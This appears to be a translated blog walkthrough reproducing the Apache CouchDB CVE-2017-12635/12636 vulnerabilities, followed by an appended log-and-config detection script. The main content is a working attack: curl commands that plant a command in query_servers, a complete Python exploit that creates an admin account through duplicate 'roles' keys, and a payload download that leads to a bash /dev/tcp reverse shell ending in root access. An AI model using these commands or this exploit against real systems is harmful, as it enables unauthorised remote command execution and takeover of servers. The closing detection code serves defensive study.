Shulou (Shulou.com), 06/01 report; updated 2025-01-24.
Vulnerability principle:
Apache CouchDB is an open source database that focuses on ease of use and on being a "database that fully embraces the web". It is a NoSQL database that uses JSON as its storage format, JavaScript as its query language, and MapReduce and HTTP as its API. It is widely used: the BBC uses it in its dynamic content presentation platform, Credit Suisse uses it in the market framework of its internal merchandise department, and Meebo uses it in its social platform (web and applications).
CVE-2017-12635 and CVE-2017-12636 were disclosed on November 15, 2017. CVE-2017-12636 is an arbitrary command execution vulnerability: we can modify the query_servers setting in CouchDB's configuration through the config API, and the configured command is run when a design document's view is created and executed.
Reproducing the vulnerability:
1. Add a query_servers configuration entry containing the command to be executed.
curl -X PUT 'http://pppp:pppp@<target-ip>:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
pppp:pppp is the account name and password I created myself (marked with a red arrow in the screenshot).
2. Create a temporary database and insert a document into it.
① curl -X PUT 'http://pppp:pppp@<target-ip>:5984/oll'
② curl -X PUT 'http://pppp:pppp@<target-ip>:5984/oll/vul' -d '{"_id": "770895a97726d5ca6d70a22173005c7b"}'
The red arrow in the screenshot marks the name you created yourself.
3. Call the query server to process the data.
curl -X PUT 'http://pppp:pppp@<target-ip>:5984/oll/_design/vul' -d '{"_id": "_design/test", "views": {"wooyun": {"map": ""}}, "language": "cmd"}' -H "Content-Type: application/json"
Using the exploit to get a reverse shell:
1. Reverse-shell script: create an index.html under home and add the following:
bash -i >& /dev/tcp/172.16.11.2/9000 0>&1
The red arrow marks the local machine's IP.
2. Open another terminal and run python -m SimpleHTTPServer 8000 under home.
3. Create a script named exp.py, as follows:
#!/usr/bin/env python3
import requests
from requests.auth import HTTPBasicAuth

target = 'http://192.168.8.148:5984'
command = '"bash -i >& /dev/tcp/192.168.8.148/4444 0>&1"'
version = 2  # 1 selects the CouchDB 1.x endpoints, 2 the 2.x endpoints

session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }

# Create the user; the "roles" key is deliberately sent twice.
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
  "type": "user",
  "name": "wooyun",
  "roles": ["_admin"],
  "roles": [],
  "password": "wooyun"
}''')

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

# Write the command into the query_servers configuration.
if version == 1:
    session.put(target + '/_config/query_servers/cmd', data=command)
else:
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=command)

# Create a database and a document for the view to process.
session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

# Create a view whose language is the new query server.
if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language": "cmd", "map": ""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id": "_design/test", "views": {"wooyun": {"map": ""}}, "language": "cmd"}')
4. Change the value of command in exp.py to: curl 172.16.11.2:8000 -o /tmp/bashell, save the file, and run python exp.py.
At this point you can see that the HTTP server receives the download request.
5. Open another terminal and listen on local port 9000: nc -lnvp 9000
6. Change the value of command in exp.py to bash /tmp/bashell, save the file, and run python exp.py; the reverse shell connects back successfully.
target is the target machine's IP (be sure to write it correctly; don't repeat my mistake of entering my own IP, which cost me a day of worry).
7. It worked.
Got root.
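For defenders, the steps above leave two visible traces: a write to the query_servers configuration path and a leftover entry in that configuration section. The following detection sketch is an added example, not code from the original article or from CouchDB; the log layout, the sample lines and the allowlist of expected query server names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches "METHOD /path STATUS" anywhere in a line, so differing log
# prefixes are tolerated (the exact log layout is an assumption).
REQ = re.compile(r'\b(GET|PUT|POST|DELETE)\s+(/\S*)\s+(\d{3})\b')
# Config paths seen in step 1 and in exp.py: direct and per-node.
CFG = re.compile(r'^(?:/_node/[^/]+)?/_config/query_servers/([^/?]+)')
# Assumption: only these query server names are expected on this install.
EXPECTED = {"javascript", "coffeescript"}

def flag_query_server_writes(lines):
    """Return (line_no, name, status) for each PUT/DELETE on query_servers."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQ.search(line)
        if not m or m.group(1) not in ("PUT", "DELETE"):
            continue
        c = CFG.match(unquote(m.group(2)))
        if c:
            hits.append((no, c.group(1), int(m.group(3))))
    return hits

def audit_query_servers(section, expected=EXPECTED):
    """Return entries of the query_servers section that are not allowlisted."""
    return {k: v for k, v in section.items() if k not in expected}

# Constructed sample data (not taken from a real server).
SAMPLE_LOG = [
    '[notice] 2017-11-15T10:00:01Z couchdb@127.0.0.1 <0.1.0> a1 10.0.0.5 '
    'PUT /_node/couchdb@127.0.0.1/_config/query_servers/cmd 200 ok 3',
    '[notice] 2017-11-15T10:00:02Z couchdb@127.0.0.1 <0.1.0> a2 10.0.0.5 '
    'PUT /oll/vul 201 ok 5',
    '[info] [<0.2.0>] 10.0.0.5 - - PUT /_config/query_servers/cmd 401',
    '[info] [<0.2.0>] 10.0.0.5 - - GET /_config/query_servers/javascript 200',
]
SAMPLE_CFG = {
    "javascript": "/usr/bin/couchjs /usr/share/couchdb/server/main.js",
    "cmd": "id >/tmp/success",
}

if __name__ == "__main__":
    for hit in flag_query_server_writes(SAMPLE_LOG):
        print("query_servers write:", hit)
    print("unexpected entries:", audit_query_servers(SAMPLE_CFG))
```

Failed attempts (such as the 401 in the sample) are reported too, since a rejected write to this path is still worth reviewing.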